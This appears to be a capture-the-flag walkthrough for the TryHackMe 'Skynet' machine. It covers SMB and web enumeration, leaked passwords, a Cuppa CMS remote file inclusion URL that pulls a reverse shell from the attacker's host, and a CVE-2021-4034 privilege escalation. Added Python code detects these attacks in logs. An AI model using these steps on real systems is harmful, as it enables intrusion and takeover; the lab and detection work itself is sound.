Skynet machine on THM

A vulnerable Terminator themed Linux machine perfect for exploring SMB vulnerabilities and enumeration techniques.
Information gathering
Enumeration
nmap
Command:
```sh
nmap -sC -sV -A [machineIp]
```
Results:
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA SASL UIDL TOP PIPELINING RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have post-login ID more listed capabilities Pre-login OK IMAP4rev1 ENABLE LOGIN-REFERRALS SASL-IR LOGINDISABLEDA0001 IDLE LITERAL+
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Smbmap
Command:
```sh
smbmap -u guest -d SKYNET\x00 -H 10.10.19.223 -P 139
```
Results:
```
[+] Guest session IP: 10.10.19.223:139 Name: 10.10.19.223
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
```
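As an added example (not part of the original writeup), a small parser for the smbmap table above that flags every share a guest session can read or write, which is exactly what a share audit on the server side should be catching; the sample listing is constructed to mirror the output above.

```python
import re

# Constructed sample in the layout smbmap prints (mirrors the listing above).
SMBMAP_OUTPUT = """\
[+] Guest session   IP: 10.10.19.223:139  Name: 10.10.19.223
        Disk          Permissions     Comment
        ----          -----------     -------
        print$        NO ACCESS       Printer Drivers
        anonymous     READ ONLY       Skynet Anonymous Share
        milesdyson    NO ACCESS       Miles Dyson Personal Share
        IPC$          NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))
"""

# Permission strings smbmap uses in its Permissions column.
PERMS = ("NO ACCESS", "READ ONLY", "WRITE ONLY", "READ, WRITE")
ROW = re.compile(r"^\s*(\S+)\s+(" + "|".join(re.escape(p) for p in PERMS) + r")\s*(.*)$")


def parse_smbmap(text):
    """Return [(share, permission, comment)] for every share row in smbmap output.

    Header, separator and session lines do not carry a permission string, so the
    regex skips them without special-casing.
    """
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1), m.group(2), m.group(3).strip()))
    return rows


def guest_exposed(text):
    """Shares readable or writable without credentials: each needs an owner to justify it.

    IPC$ is excluded because a null session to it is normal Samba behaviour.
    """
    return [(share, perm) for share, perm, _ in parse_smbmap(text)
            if perm != "NO ACCESS" and share.upper() != "IPC$"]


if __name__ == "__main__":
    for share, perm in guest_exposed(SMBMAP_OUTPUT):
        print(f"guest-accessible share: {share} ({perm})")
```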
Smbclient
Command:
```sh
smbclient -L 10.10.19.223  # list shares
```
Results:
```
Password for [WORKGROUP\rizi85]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
```
dirb
Command:
```sh
dirb http://[machineIp]
```
Results:
```
---- Scanning URL: http://10.10.19.223/ ----
==> DIRECTORY: http://10.10.19.223/admin/
==> DIRECTORY: http://10.10.19.223/config/
==> DIRECTORY: http://10.10.19.223/css/
+ http://10.10.19.223/index.html (CODE:200|SIZE:523)
==> DIRECTORY: http://10.10.19.223/js/
+ http://10.10.19.223/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.19.223/squirrelmail/
```
Exploitation
Foothold
- Smbclient - anonymous connect
Command:
```sh
smbclient //10.10.161.244/anonymous -U " "%" "
```
Results:
```
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs
```
- Get attention.txt and the contents of the logs folder, then view the files
attention.txt
```sh
cat attention.txt
```
```
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```
log1.txt
```sh
cat log1.txt
```
```
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
...
```
Data exfiltration
- Using the data discovered in the scanning phase we can log in to the email interface at http://10.10.19.223/squirrelmail/ with user milesdyson and password cyborg007haloterminator
- By checking the mailbox we find an email containing the samba password for milesdyson:
“We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B
“
- Connect to the samba share using the password from the email
```sh
smbclient //10.10.161.244/milesdyson -U milesdyson
```
- Check the notes folder and retrieve the important.txt file
```sh
cat important.txt
```
```
- Add features to beta CMS /45kra24zxs28v3yd
- Work on T-800 Model 101 blueprints
- Spend more time with my wife
```
- Check the newly discovered location on the web server: http://10.10.161.244/45kra24zxs28v3yd/administrator
- This location is the login page for Cuppa CMS, which is vulnerable as described at https://www.exploit-db.com/exploits/25971
- Using the vulnerable URL from the exploit page you can execute code remotely by including a shell.php
- Create a PHP reverse shell file called shell.php (use the pentestmonkey one)
- Start a local instance of the python HTTP server on the port referenced in the crafted URL
```sh
python3 -m http.server 8090
```
- Craft the URL that includes the code: http://10.10.221.44/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.35.41:8090/shell.php
- Use the reverse shell connection to grab the flag from /home/milesdyson: [UserFlag]
Privilege escalation
- Spawn an interactive TTY shell using python
```sh
python -c 'import pty; pty.spawn("/bin/bash")'
```
- Get the linpeas.py script from https://github.com/carlospolop/PEASS-ng/releases
- Upload the script to the victim machine using the python HTTP server
- Run the script and check the output. As per the results, the target is vulnerable to CVE-2021-4034 (https://www.exploit-db.com/exploits/50689)
- Change user with su milesdyson (password Cyborg007haloterminator)
- Get the C script onto the victim machine and compile it
```sh
gcc exploit.c -o exploit  # compile
./exploit                 # run the exploit
```
- Now you have root. Get the root flag: [RootFlag]
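As an added defender-side example (not part of the original writeup), two detections for the steps above: the Cuppa CMS file-inclusion request against alertConfigField.php in the Apache access log, and the pkexec message that public CVE-2021-4034 exploits typically leave in auth.log (the message text is the one the Qualys advisory for the CVE reports; the log lines themselves are constructed samples).

```python
import re

# Constructed Apache access-log lines (combined format); not taken from the real machine.
ACCESS_LOG = """\
10.8.35.41 - - [26/Nov/2020:11:10:01 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.35.41:8090/shell.php HTTP/1.1" 200 5432
10.8.35.41 - - [26/Nov/2020:11:10:02 +0000] "GET /45kra24zxs28v3yd/administrator/index.php HTTP/1.1" 200 1204
192.0.2.7 - - [26/Nov/2020:11:11:09 +0000] "GET /index.html HTTP/1.1" 200 523
"""

# Constructed auth.log lines. The pkexec message is the trace the Qualys advisory for
# CVE-2021-4034 names as what most public exploits leave behind; the rest is made up.
AUTH_LOG = """\
Nov 26 11:20:13 skynet pkexec[2208]: www-data: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=(null)]
Nov 26 11:21:00 skynet sshd[2301]: Accepted password for milesdyson from 192.0.2.7 port 51022 ssh2
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
# A query parameter whose value is itself an http(s) URL is the shape of the
# Cuppa CMS remote file inclusion (urlConfig=http://...).
RFI_PARAM = re.compile(r'[?&]([^=&]+)=(https?://[^&\s]+)', re.IGNORECASE)
PKEXEC_ANOMALY = re.compile(
    r'pkexec\[\d+\]: (\S+): The value for the SHELL variable was not found the /etc/shells file')


def find_rfi(access_log):
    """Requests passing a remote URL as a parameter value: source IP, script, parameter, included URL."""
    hits = []
    for line in access_log.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        src, target = m.groups()
        for param, include in RFI_PARAM.findall(target):
            hits.append({"src": src, "script": target.split("?", 1)[0],
                         "param": param, "include": include})
    return hits


def find_pkexec_abuse(auth_log):
    """Accounts on whose behalf pkexec logged the SHELL anomaly that PwnKit exploitation produces."""
    hits = []
    for line in auth_log.splitlines():
        m = PKEXEC_ANOMALY.search(line)
        if m:
            hits.append({"user": m.group(1), "line": line})
    return hits
```

Patching policykit is the fix for the second finding; where that is not yet possible, removing the SUID bit from pkexec (`chmod 0755 /usr/bin/pkexec`) is the documented temporary mitigation.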